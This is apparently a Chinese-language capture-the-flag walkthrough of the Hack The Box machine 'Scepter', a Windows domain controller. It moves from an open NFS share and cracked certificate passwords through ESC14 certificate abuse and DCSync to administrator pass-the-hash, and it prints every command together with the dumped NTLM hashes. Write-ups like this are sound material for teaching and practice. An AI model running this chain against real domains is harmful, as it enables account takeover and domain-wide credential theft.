基本信息

端口扫描

没有web,常规windows域端口,还有个2049 nfs:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
nmap -sC -sV -Pn 10.10.11.65
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-22 18:00 JST
Nmap scan report for 10.10.11.65
Host is up (0.10s latency).
Not shown: 985 closed tcp ports (conn-refused)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-04-22 16:41:55Z)
111/tcp  open  rpcbind       2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: scepter.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-04-22T16:42:51+00:00; +7h40m18s from scanner time.
| ssl-cert: Subject: commonName=dc01.scepter.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.scepter.htb
| Not valid before: 2024-11-01T03:22:33
|_Not valid after:  2025-11-01T03:22:33
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: scepter.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.scepter.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.scepter.htb
| Not valid before: 2024-11-01T03:22:33
|_Not valid after:  2025-11-01T03:22:33
|_ssl-date: 2025-04-22T16:42:52+00:00; +7h40m17s from scanner time.
2049/tcp open  nlockmgr      1-4 (RPC #100021)
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: scepter.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.scepter.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.scepter.htb
| Not valid before: 2024-11-01T03:22:33
|_Not valid after:  2025-11-01T03:22:33
|_ssl-date: 2025-04-22T16:42:51+00:00; +7h40m18s from scanner time.
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: scepter.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-04-22T16:42:52+00:00; +7h40m17s from scanner time.
| ssl-cert: Subject: commonName=dc01.scepter.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.scepter.htb
| Not valid before: 2024-11-01T03:22:33
|_Not valid after:  2025-11-01T03:22:33
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
5986/tcp open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| ssl-cert: Subject: commonName=dc01.scepter.htb
| Subject Alternative Name: DNS:dc01.scepter.htb
| Not valid before: 2024-11-01T00:21:41
|_Not valid after:  2025-11-01T00:41:41
| tls-alpn:
|_  http/1.1
|_http-title: Not Found
|_ssl-date: 2025-04-22T16:42:52+00:00; +7h40m17s from scanner time.
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2025-04-22T16:42:44
|_  start_date: N/A
|_clock-skew: mean: 7h40m17s, deviation: 0s, median: 7h40m16s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 154.21 seconds

nfs

nfs未授权,可以看到一个helpdesk,里面是一些证书文件:

1
2
3
4
5
6
showmount -e 10.10.11.65
Export list for 10.10.11.65:
/helpdesk (everyone)

mkdir nfs
sudo mount -t nfs 10.10.11.65:/helpdesk ./nfs

全都复制下来

pfx

应该是adcs相关,直接尝试使用需要密码,另外baker是crt和key文件,需要处理一下转换成pfx,需要的密码先从其他pfx文件破解,几个证书文件使用的相同密码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
faketime "$(curl -sik http://10.10.11.65:5985 | grep -i 'Date: ' | sed s/'Date: '//g)" bash

python3 pfx2john.py scott.pfx > scott.hash
sudo john scott.hash --wordlist=/usr/share/wordlists/rockyou.txt

newpassword

openssl pkcs12 -export -out baker.pfx -inkey baker.key -in baker.crt

certipy-ad cert -export -pfx baker.pfx -password newpassword -out baker_unprotected.pfx

certipy-ad auth -pfx baker_unprotected.pfx -dc-ip 10.10.11.65 -domain scepter.htb

d.baker@scepter.htb
18b5fb0d99e7a475316213c15b6f22ce

# 只有baker能获取到hash,其他几个pfx都是revoked

bloodhound

得到有效认证信息后就是常规bloodhound:

1
bloodhound-python -u 'd.baker' --hashes 'aad3b435b51404eeaad3b435b51404ee:18b5fb0d99e7a475316213c15b6f22ce' -d 'scepter.htb' -ns 10.10.11.65 --zip -c All -dc 'dc01.scepter.htb'

很明显的下一步,d.baker可以强制更改a.carter的密码:

a.carter

强制更改a.carter的密码:

1
bloodyAD --host "10.10.11.65" -u 'd.baker' -p 'aad3b435b51404eeaad3b435b51404ee:18b5fb0d99e7a475316213c15b6f22ce' -d 'scepter.htb' set password "a.carter" "Password@987"

然后a.carter是 it support 组成员,对STAFF ACCESS CERTIFICATE有GenericAll:

然后STAFF ACCESS CERTIFICATE这个OU又只包含d.baker这一个已拥有的用户:

ESC14 to h.brown

根据已有信息,我们可以完全控制d.baker,包括修改他的各种属性,满足ESC 14条件:

1
2
3
4
# 上面看到的GenericAll可能是别人加的,自己加一下也可以
bloodyAD -d "scepter.htb" -u "a.carter" -p 'Password@987' --host "dc01.scepter.htb" --dc-ip "10.10.11.65" add genericAll "OU=STAFF ACCESS CERTIFICATE,DC=SCEPTER,DC=HTB" "a.carter"

bloodyAD -d "scepter.htb" -u "a.carter" -p 'Password@987' --host "dc01.scepter.htb" set object "d.baker" mail -v "h.brown@scepter.htb"

然后就可以请求修改的mail属性的h. Brown证书:

1
2
3
4
5
6
7
8
impacket-getTGT scepter.htb/d.baker -hashes :18b5fb0d99e7a475316213c15b6f22ce -dc-ip 10.10.11.65

export KRB5CCNAME="d.baker.ccache"
certipy-ad req -k -username "h.brown" -target "dc01.scepter.htb" -ca 'scepter-DC01-CA' -template 'StaffAccessCertificate' -out h.brown

certipy-ad auth -pfx h.brown.pfx -dc-ip 10.10.11.65 -domain scepter.htb -username "h.brown"

[*] Got hash for 'h.brown@scepter.htb': aad3b435b51404eeaad3b435b51404ee:4ecf5242092c6fb8c360a08069c75a0c

user flag

kerberos认证登录winrm:

1
2
export KRB5CCNAME=h.brown.ccache
evil-winrm -i dc01.scepter.htb -r scepter.htb

/etc/krb5.conf

1
2
3
4
5
6
7
8
9
10
11
12
13
14
[libdefaults]
    default_realm = SCEPTER.HTB
    dns_lookup_kdc = false
    dns_lookup_realm = false

[realms]
    SCEPTER.HTB = {
        kdc = dc01.scepter.htb
        admin_server = dc01.scepter.htb
    }

[domain_realm]
    .scepter.htb = SCEPTER.HTB
    scepter.htb = SCEPTER.HTB

ADCS to p.adams

h.brown是Certificate Management Service组成,所以同样的方式可以修改其他用户的证书相关属性,例如p.adams用户有dcsync权限,然后就和前面一样通过d.baker打ESC14:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
export KRB5CCNAME=h.brown.ccache

# 使用h.brown身份修改p.adams altSecurityIdentities属性
bloodyAD -d "scepter.htb" -u "h.brown" -k --host "dc01.scepter.htb" --dc-ip "10.10.11.65" set object "p.adams" altSecurityIdentities -v "X509:<RFC822>p.adams@scepter.htb"

# 修改d.baker mail
bloodyAD -d "scepter.htb" -u "a.carter" -p 'Password@987' --host "dc01.scepter.htb" set object "d.baker" mail -v "p.adams@scepter.htb"

export KRB5CCNAME="d.baker.ccache"
#使用d.baker身份请求p.adams证书
certipy-ad req -k -username "p.adams" -target "dc01.scepter.htb" -ca 'scepter-DC01-CA' -template 'StaffAccessCertificate' -out p.adams

# p.adams证书认证
certipy-ad auth -pfx "padams.pfx" -domain "scepter.htb" -dc-ip "10.10.11.65" -username "p.adams"

# dcsync
impacket-secretsdump -just-dc-user administrator scepter.htb/p.adams@dc01.scepter.htb -hashes :1b925c524f447bb821a8789c4b118ce0

Administrator:500:aad3b435b51404eeaad3b435b51404ee:a291ead3493f9773dc615e66c2ea21c4:::

root flag

Administrator hash登录:

1
evil-winrm -i 10.10.11.65 -u Administrator -H a291ead3493f9773dc615e66c2ea21c4

hashdump

1
2
3
4
5
6
7
8
9
10
11
12
13
14
impacket-secretsdump  scepter.htb/p.adams@dc01.scepter.htb -hashes :1b925c524f447bb821a8789c4b118ce0 -just-dc-ntlm 

Administrator:500:aad3b435b51404eeaad3b435b51404ee:a291ead3493f9773dc615e66c2ea21c4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:c030fca580038cc8b1100ee37064a4a9:::
scepter.htb\d.baker:1106:aad3b435b51404eeaad3b435b51404ee:18b5fb0d99e7a475316213c15b6f22ce:::
scepter.htb\a.carter:1107:aad3b435b51404eeaad3b435b51404ee:2e24650b1e4f376fa574da438078d200:::
scepter.htb\h.brown:1108:aad3b435b51404eeaad3b435b51404ee:4ecf5242092c6fb8c360a08069c75a0c:::
scepter.htb\p.adams:1109:aad3b435b51404eeaad3b435b51404ee:1b925c524f447bb821a8789c4b118ce0:::
scepter.htb\e.lewis:2101:aad3b435b51404eeaad3b435b51404ee:628bf1914e9efe3ef3a7a6e7136f60f3:::
scepter.htb\o.scott:2102:aad3b435b51404eeaad3b435b51404ee:3a4a844d2175c90f7a48e77fa92fce04:::
scepter.htb\M.clark:2103:aad3b435b51404eeaad3b435b51404ee:8db1c7370a5e33541985b508ffa24ce5:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:0a4643c21fd6a17229b18ba639ccfd5f:::
[*] Cleaning up...

参考资料